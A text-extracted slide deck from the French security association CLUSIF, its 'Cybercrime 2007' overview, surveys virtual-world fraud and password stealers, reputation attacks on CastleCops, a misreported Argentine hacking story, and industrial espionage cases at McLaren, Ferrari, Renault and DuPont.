Cybercrime Overview
2007 Cybercrime 2007 CLUSIF: committed to informationinformation securitysecurity
A non-profit association (created in the early 1980s)
> 600 members (50% suppliers and goods and/or service providers for 50% CISO, CIO, Managers…)
Share information � Exchanges among officially recognized experts, collective know-how, documentary resources Develop its positioning Feedback, increased visibility, Directory of Offering Members Anticipate trends � The “network”, inform offerers of expectations Promote IS security
Join…
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 2 Cybercrime 2007 Working group dynamics Active groups in 2008: Free access to White Papers • Secured IS Center Design, • Computer Forensics, Translations in English • Data Destruction and Recovery, • MEHARI Documentation, Public stands taken on issues or • PC Security Sheets, requests for proposals • Crisis Management, • Facilities Management, Permanent exchange spaces: • MEHARI Integration, MEHARI, threats, Information • CLUSIF Training Label, Systems Security Managers • 7799 Metrics, • Phreaking, • MEHARI 2007, • Cybercrime Overview, •Spyware
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 3 Cybercrime 2007 Objectives of the Overview::
Evaluate the emergence of new risks and risk determine current trends in existing risks
Put into perspective events that have made headlines
Place “high tech” crimes in the same category as more traditional felonies
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 4 Cybercrime 2007 Contributions to the 2007 Overview
Selected by a diverse working group: insurers, lawyers, journalists, law enforcement officers, goods and service providers, CISO
! AIG Europe ! National Criminal Investigation Directorate (OCLCTIC) ! CERT-IST ! National Gendarmerie ! CERT-LEXSI ! Police prefecture (BEFTI) ! CIO ! Quebec Provincial Police ! McAfee
! Orange
! Secuserve The choice of topics and the statements expressed are not necessarily those of the companies and agencies that have participated in the working group.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 5 Cybercrime 2007 Selection of media events
Presentation of � emerging risk, � a trend, � a volume of incidents.
Specific cases � impact or stakes, � case study.
The images are all rights reserved The information provided was taken from public sources. Companies are sometimes quoted for accuracy and because their names have already been mentioned in the media.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 6 Cybercrime 2007 2006 in review � “Mules”: recruitment of private individuals � 50 mules arrested in France � 14 people arrested in Holland
� Identity theft: analysis of a case � The TJX case: over 94 million credit card numbers potentially compromised $41 million in transactions with banks � Great Britain: disappearance of CD-ROMs, Her Majesty’s Revenue and Customs, driver’s licences � United States: misuse and sale of over 8 million customers files by a database administrator � TD Ameritrade: fraudulent use of over 6 million bank files
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 7 Cybercrime 2007 2006 in review � Vulnerabilities and “0-Day” attacks � Auction site used to sell exploits
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 8 Cybercrime 2007 2002-2005 in review
�2002 Overview � February: several DNS servers were the target of an attack…without consequences
� 2005 Overview � The first Master Boot Record (MBR). Based on Proof of Concept (PoC) from 2005 ?
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 9 Cybercrime 2007 Webography
http://www.channelregister.co.uk/2007/12/20/arrests_in_money_mules_scam/ http://www.zdnet.fr/actualites/imprimer/0,50000200,39370751,00.htm http://www.efluxmedia.com/news_More_than_94_Million_Credit_Card_Accounts_Co mpromised_by_TJX_Theft_09934.html
http://www.channelregister.co.uk/2007/12/03/tjx_settlement_agreement/ http://afp.google.com/article/ALeqM5ifk5W3510NgcvhvLez1qxgFdraRQ http://www.theregister.co.uk/2007/11/20/hmrc_huge_data_loss/ http://www.theregister.co.uk/2007/12/11/driver_data_discs_disaster/ http://www.channelregister.co.uk/2007/12/04/admin_steals_consumer_records/ http://www.theregister.co.uk/2007/09/15/ameritrade_database_burgled/ http://www.zdnet.fr/actualites/imprimer/0,50000200,39366862,00.htm http://www.zdnet.fr/actualites/imprimer/0,50000200,39367768,00.htm http://www.news.com/8301-10789_3-9848029-57.html http://securitywatch.eweek.com/exploits_and_attacks/stealthy_mbr_rootkit_takes_ aim_at_windows_vista.html
http://sip.tmcnet.com/news/2008/01/10/3205912.htm
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 10 Cybercrime 2007 2007 Overview
�Virtual worlds: the lure of profits
�Disrupt, destabilize… � Reputation attacks � Hacking to focus attention? � Industrial espionage � Social networking, opportunities for fraud/information theft
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 11 Cybercrime 2007 2007 Overview
�Sophistication of attacks
� Malicious intent on eCommerce � Credit card fraud via Internet � Scams via auction sites
� Notable events � “Cyberwar” in Estonia � “Chinese” cyberattacks � Security stakes for SCADA infrastructures
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 12 Cybercrime 2007 Virtual Worlds The lure of profits
Earning and spending money are the two main concerns of residents
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 13 Cybercrime 2007 Virtual Worlds
At the crossroads of massively multiplayer online games and social networking, virtual worlds have gained enormous popularity
Gartner predicts that 80% of active Internauts will have a second life in a virtual world by 2011.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 14 Cybercrime 2007 Virtual Worlds
These are constantly growing worlds, populated by programs that simulate characters and avatars, lifelike images of connected users.
Types of access:
• totally free, F2P (Free to Play) • restricted to the free version, B2P (Buy the game to Play) • requires payment, P2P (Pay to Play)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 15 Cybercrime 2007 Virtual Worlds
• The massively multiplayer online The 10 main virtual worlds games (MMORPG - Massively Name Category Multiplayer Online Role-Playing Games) outnumber the rest Dofus • 122 references on MMOGData Final Fantasy XI Guild Wars Knight Online Fantasy Lineage Role playing Lineage II Others Runescape World of Sci-Fi (Futuristic world) Warcraft Social Sci-Fi Sports Entropia Universe Fight simulation Role playing Super Hero Second Life Social
Fantasy (Mythical universe combining heros, warriors, magic and witchcraft, ancient cultures and supernatural elements)
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 16 Cybercrime 2007 Virtual Worlds
• 100,000 premium accounts (requiring payment) in Second Life
• Over 4 million free accounts
• 8.5 million premium accounts opened for WoW
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 17 Cybercrime 2007 Virtual Worlds=Virtual Currency
Inhabitants spend a lot of energy, time and money in virtual worlds. Their virtual money, objects, relationships and even “powers” are envied. Over 1.5 million dollars change hands daily on Second Life.
Game Currency AllAll currenciescurrencies are are convertible.convertible. Dofus Kamas TheThe exchangeexchange raterate variesvaries Entropia Universe PED dependingdepending on on thethe site.site. Final Fantasy XI Gil Guild Wars Gold Knight Online US Dollars Lineage II Adena Runescape Gold Second Life Linden Dollar World of Warcraft Gold
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 18 Cybercrime 2007 Virtual Worlds Certain lands and characters are coveted and sometimes for sale
Zeuzo, a “rogue night elf” was recently sold for € 7,000 on eBay. This character owned an exceptionally rare weapon: one of the only two existing Warglaives of Azzinoth.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 19 Cybercrime 2007 Virtual Worlds They target the Gold Keylogging (Trojan Horse – financial world: • PWS-BANKER PassWord Stealer)
They target cached PWS Variants Classified passwords: • PWS-LDPINCH 25000 They capture 20000 passwords without discernment: TOTAL Q4-2007 15000 TOTAL Q3-2007 • KEYLOG-ARDAMAX TOTAL Q2-2007 10000 TOTAL Q1-2007 Over 30% of them target virtual worlds: 5000 • PWS-MMORPG • PWS-LINEAGE
0 • PWS-LEGMIR PWS- PWS- PWS- PWS- PWS- KEYLOG- • PWS-GAMANIA BANKER MMORPG LDPINCH LINEAGE LEGMIR ARDAMAX • PWS-WOW
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 20 Cybercrime 2007 Virtual Worlds Gold Keylogging (Virus)
Complexity • Rootkit technology (W32/Detnat) • Stealthy and polymorphic (W32/Bacalid)
Several variants • W32/HLLP.Philis •W32/Fujaks Virus Number of variants over the period
2005 2006 Q1/Q3-2007
W32/HLLP.Philis 18 158 377
W32/Fujacks 0 0 511
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 21 Cybercrime 2007 Virtual Worlds Gold phishing
WoW players received this e-mail in October 2007.
Source: http://exodus.superforum.fr/news-f11/warning-keylogger-t2056.htm Thinking they were connecting to the link provided, they were actually redirected to a mirror site resembling a Blizzard site.
It requested players’ log on information as well as their CD key!
In early November, a 17-year-old teenager from the Netherlands was arrested at his parents’ home by real police officers for stealing…virtual furniture. Using a mirror site, he and five other friends were accused of taking off with € 4,000 in e- furniture that had been purchased by their owners with real money.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 22 Cybercrime 2007 Virtual Worlds Gold farming: like in the textile industry, teenagers are exploited to collect virtual money.
• It is not a game • 12 hours/day • 7 days/week • 25 cents/hour • They too use “bots” • The virtual gold collected is transferred to brokers who sell it and keep the profits.
Note: In the world of online gaming, a bot New York Times video source: is a program that can play in place of a http://www.mathewingram.com/work/2007/06/17/new-york-times-portrait- human. of-a-virtual-sweatshop/
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 23 Cybercrime 2007 Virtual Worlds Gold farming Major international service providers for players and software editors of massively multiplayer online role playing games have been pointed out.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 24 Cybercrime 2007 Virtual Worlds Virus anecdotes In 2005, a fatal “real pathogenic virtual bug” caused a viral epidemic, killing players under level 50. Its origin was thought to be linked to the application of a patch that added a new dungeon online. In this dungeon, players/spare time coders seemed to have tampered with the “Corrupted Blood” curse by making it highly contagious. The designers created “quarantine areas” where players resigned to die without contaminating “healthy” persons.
In 2006, Second Life temporary shut down following the appearance of malware in the form of a gold ring that would double once it was touched. In no time, the servers were considerably slowed down. Blood God Hakkar (www.wowwiki.com) August 2006, the first viruses targeting Lua script appeared. Since then, viruses and (fake) anti-viruses have been circulating on this platform.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 25 Cybercrime 2007 Virtual Worlds Scripting languages (open source) used for these worlds enable impressive animation and activities.
In LSL (Linden Scripting Language), the old Rest assured, if you are killed functions used to visualize explosions in Second Life, all you need to (llMakeFire, llMakeExplosion, llMakeSmoke) do is close the game and have been abandoned for more developed relaunch it to be reborn. functions (llParticleSystem).
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 26 Cybercrime 2007 Virtual Worlds Scripting languages (open source) used for these worlds could make it possible to copy attacks well known in the traditional Internet environment. Some functionalities to monitor: � Sending of e-mails �IIMail. To protect against spam, there is a 20-second pause in scripting between two sendings “Maxel Cortes has invited you to join a group. Ce groupe a été crée pour pouvoir passer les annonces de ventes : que ce soit des terrains, des objets, des vêtements… enfin tout ce qui peut être vendu….. et même passer des annonces si vous cherchez quelque chose…… Alors n’hésitez pas!!!!!!“
“Ameno Heron has invited you to join a group. Faites votre pub sans restriction sans retenue tout est permis infos doc landmark vente location infos en tout genre“
� Sending of a XML-RPC request �IISendRemoteData. To protect against DDoS attacks, there is a 3-second pause in scripting between two requests � HTTP interface �IIHTTPRequest, IILoadURL. 1-second pause
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 27 Cybercrime 2007 Virtual Worlds Adult sex business and child pornography are normal activities Is a virtual crime punishable in the real world?
After a character in the virtual game Second Life was raped, the
Taken from the Skynet video file: Brussels criminal police opened an http://news.sky.com/skynews/article/0,,30100-1290719,00.html investigation and put the Federal Computer Crime Unit in charge of the case.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 28 Cybercrime 2007 Virtual Worlds
Positive aspects
A meeting and exchange place; once VoIP functionalities are installed, only a microphone is necessary to participate in group exchanges An exhibition showcase for artists and companies An innovation area for manufacturers, political organizations, associations, universities, libraries or researchers
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 29 Cybercrime 2007 Webography
� MMOGData (Online Data About Online Game): http://mmogdata.voig.com/ � New York Times: Portrait of a virtual sweatshop: http://www.mathewingram.com/work/2007/06/17/new- york-times-portrait-of-a-virtual-sweatshop/ � La Federal Computer Crime Unit enquête sur un viol dans Second Life: http://www.7sur7.be/hlns/cache/fr/det/art_439417.html � Perverts Use Virtual World For Fantasies: http://news.sky.com/skynews/article/0,,30100-1290719,00.html � Délinquance virtuelle sur internet : Habbo et Second Life dans le viseur...: http://www.mylittlebuzz.com/?post/Delinquance-virtuelle-sur-internet-%3A-Habbo-et-Second-Life-dans-le- viseur-422 � Les mondes virtuels : En attendant le Metaverse: http://stephanebayle.typepad.com/sl_business_review/Orange-Metaverse.pdf � WoW : grippe avata-viaire ?: http://www.presence-pc.com/actualite/World-Warcraft-11915/ � Virus: Second Life ferme temporairement: http://techno.branchez-vous.com/actu/06-11/10-335701.html � Second Life Gets Nuked: http://kotaku.com:80/gaming/second-life/second-life-gets-nuked-239406.php � Second Life, une seconde économie: http://www.lemonde.fr/web/article/0,1-0@2-651865,36- 937980,0.html � Arrêté pour un vol de meubles virtuels: http://tf1.lci.fr/infos/high-tech/0,,3623679,00-arrete-pour-vol- meubles-virtuels-.html � Just Killin': Avatar Murder: http://www.secondlifeinsider.com/2007/03/08/just-killin-avatar-murder/ � Recommandation du Forum des droits sur l’internet « Jeux vidéo en ligne : Quelle gouvernance ? »: http://www.foruminternet.org/specialistes/concertation/recommandations/recommandation-du-forum-des- droits-sur-l-internet-jeux-video-en-ligne-quelle-gouvernance.html
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 30 Cybercrime 2007 Panorama 2007
�Virtual Worlds: the lure of profits
�Disrupt, destabilize… � Reputation attacks � Hacking to focus attention? � Industrial espionage � Social networking, opportunities for fraud/information theft
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 31 Cybercrime 2007 Disrupt, destabilize
�1) Reputation attacks
- CastleCops was the victim of several distributed denial of service (DDoS) attacks in 2007 - Other anti-spam and anti-phishing organizations were also attacked by distributed denial of service atacks this year - After the denial of service, CastleCops was involved in a strange case
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 32 Cybercrime 2007 Disrupt, destabilize
Although these denial of service attacks regularly target anti-spam and anti-phishing organizations, CastleCops was also hit by another, more surprising form of attack soon afterwards:
An attack on its reputation.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 33 Cybercrime 2007 Disrupt, destabilize
- Paypal payments were made to CastleCops. - These donations partly came from bank accounts with information obtained through phishing. - Donations ranged from $1 to $2,800.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 34 Cybercrime 2007 Disrupt, destabilize
- CastleCops were faced with complaints and insults from the the debited account holders.
- They thought CastleCops was the obvious culprit that was helping itself to their accounts.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 35 Cybercrime 2007 Disrupt, destabilize - September 14, 2007: Paul Laudanski, co- founder of CastleCops made a statement on the Web site.
- He explained that CastleCops was the unwilling recipient of the fraudulent donations.
- In fact, they were being suspected of fraud simply because they were receiving these “donations”.
- This case could only serve to discredit CastleCops. CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 36 Cybercrime 2007 Disrupt, destabilize - In this case, CastleCops was a victim like the debited account holders, as well as Paypal.
-Brian Kerbs described this event as a “reputation attack” in the Washington Post Security Fix blog on September 2007.
-The reputation of CastleCops was indeed smeared (even temporarily) out of malice.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 37 Cybercrime 2007 Disrupt, destabilize
- Other problems also ensued for CastleCops.
- It was forced to spend its time, resources and money to confront the account holders, make verifications, examine accounting records, reimburse the rightful owners, endure complaints, file a complaint itself, give explanations, etc.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 38 Cybercrime 2007 Disrupt, destabilize
CastleCops was also faced with the temporary suspension of its account as Paul Landauski explained:
“As a result our account was frozen so we could not receive any donations until it was determined that we were also a victim.”
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 39 Cybercrime 2007 Disrupt, destabilize
Was CastleCops the sole target?
Other organizations that fell prey to DDoS attacks around the same time, such as: spamhaus.org, spamnation.info, aa419.org, 419eater.com, scamwarners.com, killspammers, fraudwatchers.org, ScamFraudAlert.com, antispam.de
Did they also receive fraudulent donations?
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 40 Cybercrime 2007 Disrupt, destabilize With this type of fraud that can transfer suspicion to a third party and smear its reputation: Are we witnessing a new form of destabilization? How common is it?
Another case was reported in 2007: Fraudulent donations of $5 to $3,000 were made to Ron Paul, the Republican candidate from Texas.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 41 Cybercrime 2007 Disrupt, destabilize
Is it just a matter of reputation attacks? Or is it a way of checking the validity of the stolen credit card information? Or are the perpetrators testing fraud detection systems of financial institutions (range of amounts)? Or all of this at once?
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 42 Cybercrime 2007 Disrupt, destabilize
Webography http://www.castlecops.com/a6827- eChecks_and_Credit_Charges_%E2%80%93_I_Didn%E2% 80%99t_Authorize_That.html http://blog.washingtonpost.com/securityfix/2007/09/the_d anger_of_reputation_attac.html http://news.zdnet.co.uk/security/0,1000000189,39289509 ,00.htm http://www.theregister.co.uk/2007/09/21/castlecops_fraud ulent_donation/ http://www.reporternews.com/news/2007/nov/21/fraudule nt-donations-made-to-ron-paul/?printer=1/
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 43 Cybercrime 2007 Disrupt, destabilize
�2) Hacking to focus attention?
One of the goals of the Cybercrime Overview is to replace in their context (if necessary) and relativize certain stories that made news last year. Here is one pertinent case.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 44 Cybercrime 2007 Disrupt, destabilize
A news story published in 2007 captured our attention. It concerned a security issue that could have had destabilizing consequences on the economy of an entire country.
On February 24, 2007, we learned that:
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 45 Cybercrime 2007 Disrupt, destabilize
“A hacker has played a trick on Argentinian drivers,” that the Web site of the Secretary of Energy has been “hacked into”, that gas stations have been deleted from the official list of fuel deliveries, depriving a thousand gas stations of fuel in Argentina.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 46 Cybercrime 2007 Disrupt, destabilize
The story was published by several media sources in Argentina, such as the major newspapers CLARIN, la NACION, And the information in French successively duplicated by news Web sites or blogs all spoke of hacking. Headlines such as “Argentina: national gas distribution paralyzed by hacker” had readers imagining the panic of drivers and the preparation for combat by authorities.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 47 Cybercrime 2007 Disrupt, destabilize This story interested us in our study of cybercrime and we decided to find out more. To do so, we returned to the sources of the information published in Argentinian by the local media and encountered several surprises. On that same February 24, 2007, the Argentinian press agency TELAM spoke of a “computer error” instead of hacking, and 3,000 stations deleted rather than the one thousand as told by the French Web sites.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 48 Cybercrime 2007 Disrupt, destabilize The Argentinian media that had first reported that the Secretary of Energy Web site was hacked published corrections and denials the same day: -No hacking -No computer error -The deleted gas stations were rightly removed from the supply list because they were not in accordance with regulations
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 49 Cybercrime 2007 Disrupt, destabilize And since several Web sites in French remained set on the initial news of hacking without publishing or directing readers to the corrections, it seems that the follow-up of the story’s developments was disrupted…
A disruption that was likely due to the absence of French translations of the subsequent denials published by the Argentinian media.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 50 Cybercrime 2007 Disrupt, destabilize
But how did this hacking story come about? The first source of information for the Argentinian media was a news release issued by the Federation of Fuel Industrialists of the Republic of Argentina (FECRA). It was the FECRA that informed the press of the deletion of gas stations from the list published on the Secretary of Energy Web site. It was also the FECRA that was cited as a source for the report of hacking in the media.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 51 Cybercrime 2007 Disrupt, destabilize Questioned several times by Argentinian journalists on that same February 24, 2007, the FECRA would finally state that the Secretary of Energy system was neither hacked nor affected by a computer error. It would declare that it had been misled by news published on a third party Web site (We did not find this information when we visited the site in January 2008).
In the course of one morning on February 24, 2007, news of hacking created a fever then disappeared.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 52 Cybercrime 2007 Disrupt, destabilize But perhaps it is useful to focus on the context in which the news of hacking was launched.
Argentinian hackers are certainly active but most importantly around the time the story was published, relations were tense between professionals of the fuel distribution sector in Argentina and authorities.
The professionals stated that their project was intended to force progress with regards to the Secretary of Energy.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 53 Cybercrime 2007 Disrupt, destabilize
We can make a tentative hypothesis:
A pseudo hacking at the right moment to focus the attention of the population, destabilize the Secretary of Energy and accelerate the start of negotiations?
Maybe yes, maybe no…
Regardless, it could be useful to know what elements were missing from the initial story, at the risk of having to requalify the nature and extent of an event.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 54 Cybercrime 2007 Disrupt, destabilize
Webography http://fr.news.yahoo.com/24022007/202/un-hacker-joue-un-vilain-tour- aux-automobilistes-argentins.html http://www.telam.com.ar/vernota.php?tipo=N&dis=27&sec=3&idPub=894 13&id=133318 http://www.telam.com.ar/vernota.php?tipo=N&dis=27&sec=3&idPub=894 13&id=133333 http://www.telam.com.ar/vernota.php?tipo=N&dis=27&sec=3&idPub=894 13&id=133409 http://www.clarin.com/diario/2007/02/24/um/m-01369551.htm http://www.lanacion.com.ar/886424 http://www.perfil.com/contenidos/2007/02/24/noticia_0020.html http://www.justiniano.com/noticias/magazine/MAGAZINE163.htm
Acknowledgments to Laura Joltac, Mornay Group.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 55 Cybercrime 2007 Disrupt, destabilize
�3) Industrial espionage
The volume of industrial espionage cases grows every year and 2007 is no exception. For companies, one of the most worrisome forms of industrial spying concern those cases committed by their own employees. The cases discussed here illustrate this problem. Thus the year 2007 was a “007” year between certain giants of Formula 1, suspected of industrial espionage: McLaren and Ferrari Renault F1 and McLaren
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 56 Cybercrime 2007 Disrupt, destabilize
These are two ongoing cases of employees leaking strategic information.
Because they are still pending, it is important to heed caution until subsequent developments are known and any rulings rendered.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 57 Cybercrime 2007 Disrupt, destabilize
1st case: Ferrari-McLaren Summer 2007: Ferrari accuses McLaren- Mercedes of spying. Mike Coughlan, designer of the single-seaters of Alonso and Hamilton for McLaren, was suspected of receiving classified information on the F2007 from Nigel Stepney, chief technician at Ferrari. The Fédération Internationale de l’Automobile (FIA) took on the case pursuant to Article 151c of its Sporting Code that prohibits any act prejudicial to the image of the Championship or those of F1 in general.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 58 Cybercrime 2007 Disrupt, destabilize
According to documents published by the FIA in 2007: - There may have been communication between Nigel Stepney (then at Ferrari) and Mike Coughlan (then chief designer for McLaren) between March and May 2007. - Hundreds of telephone calls, e-mails and SMS were exchanged between the two men during which Nigel Stepney may have shared strategic and confidential technical information on Ferrari.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 59 Cybercrime 2007 Disrupt, destabilize - The FIA stated that it received proof that Mike Coughlan supplied a driver at McLaren with information on Ferrari, which were then transferred to another driver. - The case was revealed when the employee of a photocopy shop in Great Britain noticed someone making copies of documents bearing the Ferrari letterhead and who asked to have the data saved on CD. - Intrigued, the employee of the shop contacted Ferrari. According to RTL radio, the person making the copies was Mike Coughlan’s wife.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 60 Cybercrime 2007 Disrupt, destabilize During a search of Mike Coughlan’s home, investigators found two CD-ROMs and 780 pages of confidential Ferrari research documentation. How did this information find itself in the hands of a top employee of the rival team McLaren? Was there a spy at Ferrari? Suspicions fell on the performance development chief, the British Nigel Stepney who claimed his innocence, denying having copied or sent anything.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 61 Cybercrime 2007 Disrupt, destabilize
The FIA decided to exclude McLaren-Mercedes from the World Constructors’ Championship in 2007. McLaren lost all its points in the rating of constructors. And was hit with a $100 million fine by the FIA. McLaren offered its apologies to Ferrari. This was the sports component of the case, handled by the FIA.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 62 Cybercrime 2007 Disrupt, destabilize But at the time of publication of this 2007 Cybercrime Overview, the legal component was still in trial in Italy for the complaint filed by Ferrari.
“The incident is closed from the sports perspective, but criminal investigations are still pending in Italy and a civil investigation is also ongoing in England,” said the Italian team, as reported by the AFP. “It is an acknowledged fact that classified information, property of Ferrari, was circulated throughout the structures of the English team,” Ferrari nevertheless restated.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 63 Cybercrime 2007 Disrupt, destabilize
The two automobile constructors McLaren and Ferrari were both heavily affected by this case. For McLaren, the consequences in 2007 were: - A ruined image - Dismissal from the 2007 Constructors’ Championship - Financial expenses undertaken at a loss? - Accusation in a criminal investigation
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 64 Cybercrime 2007 Disrupt, destabilize
2nd case: McLaren-Renault F1
- McLaren accused Renault of spying before the FIA. - A former head employee, the English engineer Philip Mackereth who left to work at Renault in September 2006 allegedly passed confidential plans and sketches to Renault.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 65 Cybercrime 2007 Disrupt, destabilize
According to FIA documents, these included: - 18 drawings, and copies on 11 disks. In particular, the FIA reported that a screen capture of a sensitive document was made by Philip Mackereth while still at McLaren. He supposedly sent it to himself by e-mail to his personal e-mail address, then later from his home sent it to his work address at Renault. Philip Mackereth acknowledged these accusations before the FIA.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 66 Cybercrime 2007 Disrupt, destabilize In early December 2007, the FIA World Council found Renault F1 guilty of violating Article 151c of the International Sporting Code by being in possession of documents belonging to McLaren. Due to the limited number of documents involved and without proof that any advantage was obtained, the FIA did not penalize Renault. But the FIA announced that if proof were to surface demonstrating that Renault benefited from the technical data provided by Phil Mackereth, it would reopen the case.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 67 Cybercrime 2007 Disrupt, destabilize Although the two cases McLaren/Ferrari and Renault/McLaren involved alleged information leaks by top employees of the company for the benefit of a rival, there is one difference to be stressed concerning Renault, which declared in a press release quoted by the newspaper L’Equipe on November 8, 2007: “Since this problem was brought to our attention, we have acted with complete transparency with regards to McLaren and the FIA, and we will continue to do so.”
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 68 Cybercrime 2007 Disrupt, destabilize
Other significant cases of espionage by employees made news in 2007, including cases of: - Theft of DuPont trade secrets - Theft of Duracell trade secrets
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 69 Cybercrime 2007 Disrupt, destabilize
3rd case: Theft of Dupont trade secrets by an ex-employee
This case has already been tried. In November 2007, Gary Min, a former chemist at DuPont (United States) was sentenced to serve 18 months of prison, fined $30,000 and ordered to pay $14,500 in damages to DuPont for stealing company secrets.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 70 Cybercrime 2007 Disrupt, destabilize He began at DuPont (United States) as a research chemist in 1995. In 2005, he entered into discussions with another company, Victrex PLC about a job in Asia. Min downloaded 22,000 abstracts and accessed more than 16,000 DuPont documents. Alerted by the volume of these consultations from its electronic library, DuPont contacted the FBI. Soon after arriving at Victrex, the ex-employee of DuPont uploaded 180 documents on his professional laptop. Informed of Gary Min’s actions by DuPont, Victrex seized the laptop and handed it over to the FBI.
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 71 Cybercrime 2007 Disrupt, destabilize The statement of November 15, 2006 by the Department of Justice (District of Delaware) specified that at Min’s home, FBI agents found: - Several computers containing DuPont documents labeled “confidential” - A deletion program launched to erase the one of the computer hard disks of upon the arrival of agents at his home - Numerous garbage bags containing shredded technical DuPont documents - Burned remnants of DuPont documents in the fireplace
CLUSIF > [email protected] + 33 1 5325 0880 http://www.clusif.asso.fr/ 17/01/2008 72 Cybercrime 2007 Disrupt, destabilize
